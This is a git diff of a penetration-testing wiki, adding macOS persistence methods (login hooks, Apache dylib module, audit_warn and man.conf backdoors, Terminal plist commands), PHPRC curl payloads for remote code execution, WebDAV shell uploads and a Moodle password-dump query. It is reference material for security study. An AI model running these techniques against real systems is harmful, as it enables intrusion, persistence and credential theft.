+* `019bdcd2` - time in hex. It represents the minutes passed since epoch. `0x019bdcd2` is `26991826` in decimal. If we multiply it by 60 we get `1619509560`, which is `GMT: 2021. April 27., Tuesday 7:46:00`.
+
+If we print the job file, we find that it contains the same information we got using `at -c`.
### Login/Logout Hooks
+**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0022/](https://theevilbit.github.io/beyond/beyond\_0022/)
+
+#### Location
+
+* You need to be able to execute something like `defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh`
+
They are deprecated but can be used to execute commands when a user logs in.
```bash
@@ -165,6 +965,7 @@ echo 'My is: \`id\`' > /tmp/login_id.txt
EOF
chmod +x $HOME/hook.sh
defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh
+defaults write com.apple.loginwindow LogoutHook /Users/$USER/hook.sh
```
This setting is stored in `/Users/$USER/Library/Preferences/com.apple.loginwindow.plist`
@@ -173,6 +974,7 @@ This setting is stored in `/Users/$USER/Library/Preferences/com.apple.loginwindo
defaults read /Users/$USER/Library/Preferences/com.apple.loginwindow.plist
{
LoginHook = "/Users/username/hook.sh";
+ LogoutHook = "/Users/username/hook.sh";
MiniBuddyLaunch = 0;
TALLogoutReason = "Shut Down";
TALLogoutSavesState = 0;
@@ -184,13 +986,128 @@ To delete it:
```bash
defaults delete com.apple.loginwindow LoginHook
+defaults delete com.apple.loginwindow LogoutHook
```
-In the previous example we have created and deleted a **LoginHook**, it's also possible to create a **LogoutHook**.
+The root user one is stored in **`/private/var/root/Library/Preferences/com.apple.loginwindow.plist`**
-The root user one is stored in `/private/var/root/Library/Preferences/com.apple.loginwindow.plist`
+{% hint style="danger" %}
+This didn't work for me, neither with the user LoginHook nor with the root LoginHook
+{% endhint %}
-### Applications Preferences
+### Apache2
+
+**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0023/](https://theevilbit.github.io/beyond/beyond\_0023/)
+
+#### Location
+
+* **`/etc/apache2/httpd.conf`**
+ * Root required
+ * Trigger: When Apache2 is started
+
+#### Description & Exploit
+
+You can indicate in /etc/apache2/httpd.conf to load a module adding a line such as:
+
+{% code overflow="wrap" %}
+```bash
+LoadModule my_custom_module /Users/Shared/example.dylib "My Signature Authority"
+```
+{% endcode %}
+
+This way your compiled moduled will be loaded by Apache. The only thing is that either you need to **sign it with a valid Apple certificate**, or you need to **add a new trusted certificate** in the system and **sign it** with it.
+
+Then, if needed , to make sure the server will be started you could execute:
+
+```bash
+sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist
+```
+
+Code example for the Dylb:
+
+```objectivec
+#include
+#include
+
+__attribute__((constructor))
+static void myconstructor(int argc, const char **argv)
+{
+ printf("[+] dylib constructor called from %s\n", argv[0]);
+ syslog(LOG_ERR, "[+] dylib constructor called from %s\n", argv[0]);
+}
+```
+
+### Finder Sync Plugins
+
+**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0026/](https://theevilbit.github.io/beyond/beyond\_0026/)\
+**Writeup**: [https://objective-see.org/blog/blog\_0x11.html](https://objective-see.org/blog/blog\_0x11.html)
+
+#### Location
+
+* A specific app
+
+#### Description & Exploit
+
+An application example with a Finder Sync Extension [**can be found here**](https://github.com/D00MFist/InSync).
+
+Applications can have `Finder Sync Extensions`. This extension will go inside an application that will be executed. Moreover, for the extension to be able to execute its code it **must be signed** with some valid Apple developer certificate, it must be **sandboxed** (although relaxed exceptions could be added) and it must be registered with something like:
+
+```bash
+pluginkit -a /Applications/FindIt.app/Contents/PlugIns/FindItSync.appex
+pluginkit -e use -i com.example.InSync.InSync
+```
+
+### BSM audit framework
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0031/](https://theevilbit.github.io/beyond/beyond\_0031/)
+
+#### Location
+
+* **`/etc/security/audit_warn`**
+ * Root required
+ * **Trigger**: When auditd detects a warning
+
+#### Description & Exploit
+
+Whenever auditd detects a warning the script **`/etc/security/audit_warn`** is **executed**. So you could add your payload on it.
+
+```bash
+echo "touch /tmp/auditd_warn" >> /etc/security/audit_warn
+```
+
+You could force a warning with `sudo audit -n`.
+
+### Man.conf
+
+Writeup: [https://theevilbit.github.io/beyond/beyond\_0030/](https://theevilbit.github.io/beyond/beyond\_0030/)
+
+#### Location
+
+* **`/private/etc/man.conf`**
+ * Root required
+ * **`/private/etc/man.conf`**: Whenever man is used
+
+#### Description & Exploit
+
+The config file **`/private/etc/man.conf`** indicate the binary/script to use when opening man documentation files. So the path to the executable could be modified so anytime the user uses man to read some docs a backdoor is executed.
+
+For example set in **`/private/etc/man.conf`**:
+
+```
+MANPAGER /tmp/view
+```
+
+And then create `/tmp/view` as:
+
+```bash
+#!/bin/zsh
+
+touch /tmp/manconf
+
+/usr/bin/less -s
+```
+
+### Terminal
In **`~/Library/Preferences`** are store the preferences of the user in the Applications. Some of these preferences can hold a configuration to **execute other applications/scripts**.
@@ -218,6 +1135,19 @@ This config is reflected in the file **`~/Library/Preferences/com.apple.Terminal
So, if the plist of the preferences of the terminal in the system could be overwritten, the the **`open`** functionality can be used to **open the terminal and that command will be executed**.
+You can add this from the cli with:
+
+{% code overflow="wrap" %}
+```bash
+# Add
+/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" 'touch /tmp/terminal-start-command'" $HOME/Library/Preferences/com.apple.Terminal.plist
+/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"RunCommandAsShell\" 0" $HOME/Library/Preferences/com.apple.Terminal.plist
+
+# Remove
+/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" ''" $HOME/Library/Preferences/com.apple.Terminal.plist
+```
+{% endcode %}
+
### Emond
Apple introduced a logging mechanism called **emond**. It appears it was never fully developed, and development may have been **abandoned** by Apple for other mechanisms, but it remains **available**.
diff --git a/macos-hardening/macos-red-teaming/README.md b/macos-hardening/macos-red-teaming/README.md
index 0f1a3c87c..2a7e3e5e9 100644
--- a/macos-hardening/macos-red-teaming/README.md
+++ b/macos-hardening/macos-red-teaming/README.md
@@ -53,7 +53,7 @@ Moreover, after finding proper credentials you could be able to brute-force othe
#### JAMF device Authentication
-
+
The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\
Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`**
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md
index 301ea5a50..aec494f71 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md
@@ -302,7 +302,7 @@ authenticate-session-owner, authenticate-session-owner-or-admin, authenticate-se
If you find the function: **`[HelperTool checkAuthorization:command:]`** it's probably the the process is using the previously mentioned schema for authorization:
-
+
Thisn, if this function is calling functions such as `AuthorizationCreateFromExternalForm`, `authorizationRightForCommand`, `AuthorizationCopyRights`, `AuhtorizationFree`, it's using [**EvenBetterAuthorizationSample**](https://github.com/brenwell/EvenBetterAuthorizationSample/blob/e1052a1855d3a5e56db71df5f04e790bfd4389c4/HelperTool/HelperTool.m#L101-L154).
@@ -314,7 +314,7 @@ Then, you need to find the protocol schema in order to be able to establish a co
The function **`shouldAcceptNewConnection`** indicates the protocol being exported:
-
+
In this case, we have the same as in EvenBetterAuthorizationSample, [**check this line**](https://github.com/brenwell/EvenBetterAuthorizationSample/blob/e1052a1855d3a5e56db71df5f04e790bfd4389c4/HelperTool/HelperTool.m#L94).
@@ -338,7 +338,7 @@ Lastly, we just need to know the **name of the exposed Mach Service** in order t
* In the **`[HelperTool init]`** where you can see the Mach Service being used:
-
+
* In the launchd plist:
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
index a6fcd53a7..bd7162715 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
@@ -22,7 +22,7 @@ Obviamente, esto es tan poderoso que es complicado cargar una extensión de kern
* Al entrar en **modo de recuperación**, las extensiones de kernel deben estar **permitidas para ser cargadas**:
-
+
* La extensión de kernel debe estar **firmada con un certificado de firma de código de kernel**, que solo puede ser otorgado por **Apple**. Quien revisará en detalle la **empresa** y las **razones** por las que se necesita.
* La extensión de kernel también debe estar **notarizada**, Apple podrá verificarla en busca de malware.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
index 5094416b3..71df34fbb 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
@@ -203,7 +203,7 @@ Example of **section header**:
If you **add** the **section offset** (0x37DC) + the **offset** where the **arch starts**, in this case `0x18000` --> `0x37DC + 0x18000 = 0x1B7DC`
-
+
It's also possible to get **headers information** from the **command line** with:
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
index 8f94ae03e..a66440c19 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
@@ -21,7 +21,7 @@ It creates a 2 of names pipes per .Net process in [dbgtransportsession.cpp#L127]
So, if you go to the users **`$TMPDIR`** you will be able to find **debugging fifos** you could use to debug .Net applications:
-
+
The function [**DbgTransportSession::TransportWorker**](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp#L1259) will handle the communication from a debugger.
diff --git a/mobile-pentesting/android-app-pentesting/android-burp-suite-settings.md b/mobile-pentesting/android-app-pentesting/android-burp-suite-settings.md
index 723ba091e..9369937f1 100644
--- a/mobile-pentesting/android-app-pentesting/android-burp-suite-settings.md
+++ b/mobile-pentesting/android-app-pentesting/android-burp-suite-settings.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -88,7 +88,7 @@ After installing Certificate SSL endpoints also working fine tested using → [h
After installing the certificate this way Firefox for Android won't use it (based on my tests), so use a different browser.
{% endhint %}
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md b/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
index d31752ac9..54d611e77 100644
--- a/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
+++ b/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
@@ -270,19 +270,19 @@ Explained in [**this video**](https://www.youtube.com/watch?v=qQicUW0svB8) you n
1. **Install a CA certificate**: Just **drag\&drop** the DER Burp certificate **changing the extension** to `.crt` in the mobile so it's stored in the Downloads folder and go to `Install a certificate` -> `CA certificate`
-
+
* Check that the certificate was correctly stored going to `Trusted credentials` -> `USER`
-
+
2. **Make it System trusted**: Download the Magisc module [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts) (a .zip file), **drag\&drop it** in the phone, go to the **Magics app** in the phone to the **`Modules`** section, click on **`Install from storage`**, select the `.zip` module and once installed **reboot** the phone:
-
+
* After rebooting, go to `Trusted credentials` -> `SYSTEM` and check the Postswigger cert is there
-
+
## Nice AVD Options
diff --git a/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md b/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md
index e24e82f87..c6e385d54 100644
--- a/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md
+++ b/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -149,7 +149,7 @@ You can see that in [the next tutorial](frida-tutorial-2.md).
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/mobile-pentesting/ios-pentesting-checklist.md b/mobile-pentesting/ios-pentesting-checklist.md
index c17b17fd2..119032d83 100644
--- a/mobile-pentesting/ios-pentesting-checklist.md
+++ b/mobile-pentesting/ios-pentesting-checklist.md
@@ -1,6 +1,6 @@
# iOS Pentesting Checklist
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -120,7 +120,7 @@ Get Access Today:
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/mobile-pentesting/ios-pentesting/README.md b/mobile-pentesting/ios-pentesting/README.md
index 7831e2c19..6c4b6c78f 100644
--- a/mobile-pentesting/ios-pentesting/README.md
+++ b/mobile-pentesting/ios-pentesting/README.md
@@ -1,6 +1,6 @@
# iOS Pentesting
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -382,7 +382,7 @@ struct CGSize {
However, the best options to disassemble the binary are: [**Hopper**](https://www.hopperapp.com/download.html?) and [**IDA**](https://www.hex-rays.com/products/ida/support/download\_freeware/).
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -744,7 +744,7 @@ Jun 7 13:42:14 iPhone touch[9708] : MS:Notice: Injecting: (null) [touch
...
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -1233,7 +1233,7 @@ You can find the **libraries used by an application** by running **`otool`** aga
* [https://github.com/authenticationfailure/WheresMyBrowser.iOS](https://github.com/authenticationfailure/WheresMyBrowser.iOS)
* [https://github.com/nabla-c0d3/ssl-kill-switch2](https://github.com/nabla-c0d3/ssl-kill-switch2)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md b/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md
index 45cf8d210..9f0eac99e 100644
--- a/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md
+++ b/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -120,7 +120,7 @@ Steps to configure Burp as proxy:
* Click on _**Ok**_ and the in _**Apply**_
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/mobile-pentesting/xamarin-apps.md b/mobile-pentesting/xamarin-apps.md
index ce288351b..9659b0024 100644
--- a/mobile-pentesting/xamarin-apps.md
+++ b/mobile-pentesting/xamarin-apps.md
@@ -18,7 +18,7 @@ Xamarin is an open-source platform that gives developers access to a comprehensi
### Xamarin Android Architecture
-
+
Xamarin offers .NET bindings to Android.\* and Java.\* namespaces. Xamarin.
@@ -36,7 +36,7 @@ It runs along with the Objective-C Runtime. The runtime environments run on top
The below-given diagram depicts this architecture:
-
+
### What is .Net Runtime and Mono Framework?
@@ -70,7 +70,7 @@ If you encounter a Full AOT compiled application, and if the IL Assembly files a
Just **unzip the apk/ipa** file and copy all the files present under the assemblies directory:
-
+
In case of Android **APKs these dll files are compressed** and cannot be directly used for decompilation. Luckily there are tools out there that we can use to **uncompress these dll files** like [XamAsmUnZ](https://github.com/cihansol/XamAsmUnZ) and [xamarin-decompress](https://github.com/NickstaDB/xamarin-decompress).
@@ -88,7 +88,7 @@ In the case of the iOS, **dll files inside the IPA files can be directly loaded*
**Most of the application code can be found when we decompile the dll files.** Also note that Xamarin Framework based apps contain 90% of common code in the builds of all platforms like iOS and Android etc.
-
+
From the above screenshot of listing the dll files that were present in the apk, we can confirm that it is a Xamarin app. It contains app-specific dll files along with the library files that are required for the app to run, such as `Xamarin.Essentails.dll` or `Mono.Security.dll` .
diff --git a/network-services-pentesting/1099-pentesting-java-rmi.md b/network-services-pentesting/1099-pentesting-java-rmi.md
index 7672e0f0a..831d09ede 100644
--- a/network-services-pentesting/1099-pentesting-java-rmi.md
+++ b/network-services-pentesting/1099-pentesting-java-rmi.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -325,7 +325,7 @@ Entry_1:
Command: rmg enum {IP} {PORT}
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/network-services-pentesting/113-pentesting-ident.md b/network-services-pentesting/113-pentesting-ident.md
index 978f7acd1..2df7c382e 100644
--- a/network-services-pentesting/113-pentesting-ident.md
+++ b/network-services-pentesting/113-pentesting-ident.md
@@ -12,7 +12,7 @@
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
@@ -87,7 +87,7 @@ ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )
identd.conf
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
diff --git a/network-services-pentesting/15672-pentesting-rabbitmq-management.md b/network-services-pentesting/15672-pentesting-rabbitmq-management.md
index 89f3c1482..1b872f86b 100644
--- a/network-services-pentesting/15672-pentesting-rabbitmq-management.md
+++ b/network-services-pentesting/15672-pentesting-rabbitmq-management.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -60,7 +60,7 @@ Content-Length: 267
* `port:15672 http`
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/network-services-pentesting/8086-pentesting-influxdb.md b/network-services-pentesting/8086-pentesting-influxdb.md
index 713e82167..4e1990610 100644
--- a/network-services-pentesting/8086-pentesting-influxdb.md
+++ b/network-services-pentesting/8086-pentesting-influxdb.md
@@ -1,6 +1,6 @@
# 8086 - Pentesting InfluxDB
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -153,7 +153,7 @@ msf6 > use auxiliary/scanner/http/influxdb_enum
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/network-services-pentesting/pentesting-postgresql.md b/network-services-pentesting/pentesting-postgresql.md
index 7df9516c7..5236c3379 100644
--- a/network-services-pentesting/pentesting-postgresql.md
+++ b/network-services-pentesting/pentesting-postgresql.md
@@ -1,6 +1,6 @@
# 5432,5433 - Pentesting Postgresql
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -681,7 +681,7 @@ The **password-based** authentication methods are **md5**, **crypt**, and **pass
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/network-services-pentesting/pentesting-ssh.md b/network-services-pentesting/pentesting-ssh.md
index 836120be3..0ff1e1ce0 100644
--- a/network-services-pentesting/pentesting-ssh.md
+++ b/network-services-pentesting/pentesting-ssh.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -313,7 +313,7 @@ id_rsa
* You can find interesting guides on how to harden SSH in [https://www.ssh-audit.com/hardening\_guides.html](https://www.ssh-audit.com/hardening\_guides.html)
* [https://community.turgensec.com/ssh-hacking-guide](https://community.turgensec.com/ssh-hacking-guide)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/network-services-pentesting/pentesting-web/jboss.md b/network-services-pentesting/pentesting-web/jboss.md
index 310ba8ca5..6e79ec29a 100644
--- a/network-services-pentesting/pentesting-web/jboss.md
+++ b/network-services-pentesting/pentesting-web/jboss.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -40,7 +40,7 @@ You can expose **management servlets** via the following paths within JBoss (dep
inurl:status EJInvokerServlet
```
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/network-services-pentesting/pentesting-web/moodle.md b/network-services-pentesting/pentesting-web/moodle.md
index 282d181b2..208b81760 100644
--- a/network-services-pentesting/pentesting-web/moodle.md
+++ b/network-services-pentesting/pentesting-web/moodle.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -120,7 +120,7 @@ find / -name "config.php" 2>/dev/null | grep "moodle/config.php"
/usr/local/bin/mysql -u --password= -e "use moodle; select email,username,password from mdl_user; exit"
```
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/README.md b/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
index 58bb5e3eb..5272fd212 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
@@ -275,6 +275,12 @@ If you find a vulnerability that allows you to **modify env variables in PHP** (
2. Upload a second file, containing an **`auto_prepend_file`** directive instructing the PHP preprocessor to execute the file we uploaded in step 1
3. Set the `PHPRC` variable to the file we uploaded in step 2.
* Get more info on how to execute this chain [**from the original report**](https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/).
+* **PHPRC** - another option
+ * If you **cannot upload files**, you could use in FreeBSD the "file" `/dev/fd/0` which contains the **`stdin`**, being the **body** of the request sent to the `stdin`:
+ * `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'`
+ * Or to get RCE, enable **`allow_url_include`** and prepend a file with **base64 PHP code**:
+ * `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'`
+ * Technique [**from this report**](https://vulncheck.com/blog/juniper-cve-2023-36845).
## PHP Static analysis
diff --git a/network-services-pentesting/pentesting-web/put-method-webdav.md b/network-services-pentesting/pentesting-web/put-method-webdav.md
index 6b2129e7d..64cf83816 100644
--- a/network-services-pentesting/pentesting-web/put-method-webdav.md
+++ b/network-services-pentesting/pentesting-web/put-method-webdav.md
@@ -1,6 +1,6 @@
# WebDav
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -66,7 +66,7 @@ curl -T 'shell.txt' 'http://$ip'
curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -132,7 +132,7 @@ wget --user --ask-password http://domain/path/to/webdav/ -O - -q
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/network-services-pentesting/pentesting-web/web-api-pentesting.md b/network-services-pentesting/pentesting-web/web-api-pentesting.md
index 8ad499068..0acd2b9a8 100644
--- a/network-services-pentesting/pentesting-web/web-api-pentesting.md
+++ b/network-services-pentesting/pentesting-web/web-api-pentesting.md
@@ -12,7 +12,7 @@
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
@@ -138,7 +138,7 @@ AutoRepeater Burp Extension: Add a replacement rule
* `Match: v2 (higher version)`
* `Replace: v1 (lower version)`
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -230,7 +230,7 @@ kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0
* [**API-fuzzer**](https://github.com/Fuzzapi/API-fuzzer): API\_Fuzzer gem accepts a API request as input and returns vulnerabilities possible in the API.
* [**race-the-web**](https://github.com/TheHackerDev/race-the-web): Tests for race conditions in web applications by sending out a user-specified number of requests to a target URL (or URLs) _simultaneously_, and then compares the responses from the server for uniqueness.
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
diff --git a/network-services-pentesting/pentesting-web/wordpress.md b/network-services-pentesting/pentesting-web/wordpress.md
index cfa3a2d12..a69f09e58 100644
--- a/network-services-pentesting/pentesting-web/wordpress.md
+++ b/network-services-pentesting/pentesting-web/wordpress.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -101,7 +101,7 @@ curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-conten
curl -s -X GET https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -285,7 +285,7 @@ wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detec
#You can try to bruteforce the admin user using wpscan with "-U admin"
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -429,7 +429,7 @@ Also, **only install trustable WordPress plugins and themes**.
* **Limit login attempts** to prevent Brute Force attacks
* Rename **`wp-admin.php`** file and only allow access internally or from certain IP addresses.
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/pentesting-web/cache-deception.md b/pentesting-web/cache-deception.md
index d86595f92..d670ad96a 100644
--- a/pentesting-web/cache-deception.md
+++ b/pentesting-web/cache-deception.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -125,7 +125,7 @@ The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vul
Example usage: `wcvs -u example.com`
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -232,7 +232,7 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S
